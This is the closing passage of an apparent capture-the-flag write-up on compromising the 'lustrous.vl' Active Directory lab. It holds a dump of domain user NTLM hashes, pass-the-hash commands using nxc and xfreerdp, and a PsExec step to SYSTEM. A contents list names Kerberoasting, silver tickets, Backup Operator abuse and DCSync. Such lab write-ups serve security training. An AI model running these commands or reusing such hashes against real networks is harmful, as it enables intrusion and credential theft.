lustrous.vl\Joanna.Harvey:1119:aad3b435b51404eeaad3b435b51404ee:000408bc26781f3453c485652fbfcc71:::
lustrous.vl\Jeremy.Clark:1120:aad3b435b51404eeaad3b435b51404ee:46068039554c7592d962ee79e86ed66b:::
lustrous.vl\Allan.Parker:1121:aad3b435b51404eeaad3b435b51404ee:7f6565f779ab0e30a8a89d9563571f5d:::
lustrous.vl\Mitchell.Fuller:1122:aad3b435b51404eeaad3b435b51404ee:ac55b50b2fdc4ecc91c9c511cbf67529:::
lustrous.vl\Colin.Dodd:1123:aad3b435b51404eeaad3b435b51404ee:13416726f488801791d0027da08fd72c:::
lustrous.vl\Liam.Atkinson:1124:aad3b435b51404eeaad3b435b51404ee:dc5248d6c0d804c638674d3ba61a27ad:::
lustrous.vl\Michelle.John:1125:aad3b435b51404eeaad3b435b51404ee:a987c80448f62e33a7ac269bef95e965:::
lustrous.vl\Iain.Evans:1126:aad3b435b51404eeaad3b435b51404ee:625fdd59d5d1b64d5f354a11f8a8d1b0:::
lustrous.vl\Donna.Collins:1127:aad3b435b51404eeaad3b435b51404ee:ada5c99f86d2f40d1e7103cda5647b09:::
lustrous.vl\Cameron.Walsh:1128:aad3b435b51404eeaad3b435b51404ee:7c55400f3da31598559e5227114e59ad:::
lustrous.vl\svc_web:1129:aad3b435b51404eeaad3b435b51404ee:e67af8b3d78df5a02eb0d57b6cb60717:::
lustrous.vl\svc_db:1130:aad3b435b51404eeaad3b435b51404ee:e9e4f101deca969c1b531486554e8400:::
LUSDC$:1000:aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4:::
LUSMS$:1133:aad3b435b51404eeaad3b435b51404ee:27383df0ae52aa0213165ee708d220b9:::

Authenticating as Administrator

❯ nxc smb 10.10.140.229 -u Administrator -H b8d9c7bd6de2a14237e0eff1afda2476 -M rdp -o action=enable-ram
SMB         10.10.140.229   445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB         10.10.140.229   445    LUSDC            [+] lustrous.vl\Administrator:b8d9c7bd6de2a14237e0eff1afda2476 (Pwn3d!)
RDP         10.10.140.229   445    LUSDC            [+] Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully

❯ xfreerdp /v:10.10.140.229 /u:'Administrator' /pth:'b8d9c7bd6de2a14237e0eff1afda2476' /dynamic-resolution /drive:kali,.

Privilege escalation from Administrator to NT Autority System

C:\Users\Administrator>.\PsExec64.exe -s -i cmd

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagInformation Gathering

hashtagService Enumeration

hashtag10.10.205.53

hashtagFTP

hashtagDNS

hashtagSMB (enum4linux-ng)

hashtagHTTP:80

hashtagKerberos

hashtagCompromising LUSMS

hashtagInitial foothold on LUSMS

hashtagDiscovering Users within FTP Service

hashtagDiscovering users via kerberos user enumeraiton

hashtagCracking the ben.cox password using hashcat

hashtagDiscovering kerberoastable users using the valid credentials

hashtagCracking ticket grating service for svc_web

hashtagPrivilege Escalation to Administrator

hashtagRetrieving the administrator credentials

hashtagAuthenticating as Administrator in LUSMS

hashtagCompromising Domain Controller (lustrous.vl)

hashtagAuthenticating into lusdc.lustrous.vl website with valid credentials

hashtagDiscovering a high valuable target using Bloodhound

hashtagCrafting silver ticket for tony.ward using mimikatz.exe

hashtagRequesting to the web application and discovering tony.ward credentials

hashtagAbusing Backup operator to compromise domain controller

hashtagDumping Registry Hives using BackupOperatorToDA

hashtagDumping the Local Security Authority

hashtagPerforming DCSync Attack

hashtagAuthenticating as Administrator

hashtagPrivilege escalation from Administrator to NT Autority System